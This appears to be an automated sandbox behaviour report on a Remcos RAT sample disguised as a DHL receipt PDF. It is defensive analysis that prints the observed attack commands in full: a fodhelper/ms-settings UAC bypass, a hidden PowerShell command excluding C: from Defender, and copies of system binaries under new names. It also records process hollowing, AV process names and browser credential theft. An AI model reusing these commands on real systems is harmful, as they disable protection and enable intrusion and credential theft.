Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 24020000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 5_2_2D5B80EF
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and write Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section unmapped: C:\Users\Public\Libraries\yfkwifxL.pif base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Memory written: C:\Users\Public\Libraries\yfkwifxL.pif base: 256008 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_2DA520F7
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59627 mouse_event, 0_2_2DA59627
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg" Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle" Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd" Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Uses taskkill to terminate processes
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerK5\
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managere=C:
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager6
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: remcos.exe, 00000005.00000003.1858721908.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr Binary or memory string: [Program Manager]
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managermcos\remcos.exe
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74C52 cpuid 0_2_2DA74C52
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028BDAA4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028A5A78
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_028AA7A8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_028AA75C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_028A5B84
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028BDAA4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, 0_2_028C5E01
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_2DA91CD8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA91F9B
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA91F50
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA888ED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoA, 0_2_2DA4F8D1
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA92543
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_2DA9243C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA88404
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_2DA92610
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_2DA920C3
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: EnumSystemLocalesW, 0_2_2DA92036
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: GetLocaleInfoW, 0_2_2DA92313
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoA, 5_2_2D5AF8D1
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5F2543
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5E8404
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_2D5F243C
Source: C:\ProgramData\Remcos\remcos.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 5_2_2D5F1CD8
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F1F50
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F1F9B
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_2D5F2610
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F2036
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5E88ED
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5F2313
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 7_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 8_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 8_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 8_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 11_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 11_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 11_2_00007FF7689B6EE4
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A91A4 GetLocalTime, 0_2_028A91A4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5B60D GetComputerNameExW,GetUserNameW, 0_2_2DA5B60D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_2DA893AD
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AB724 GetVersionExA, 0_2_028AB724
Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_2DA4BA12
Contains functionality to steal Firefox passwords or cookies
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \key3.db 0_2_2DA4BB30
Opens network shares
Source: C:\Users\Public\alpha.exe File opened: \\Windows \
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Instant Messenger accounts or passwords
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
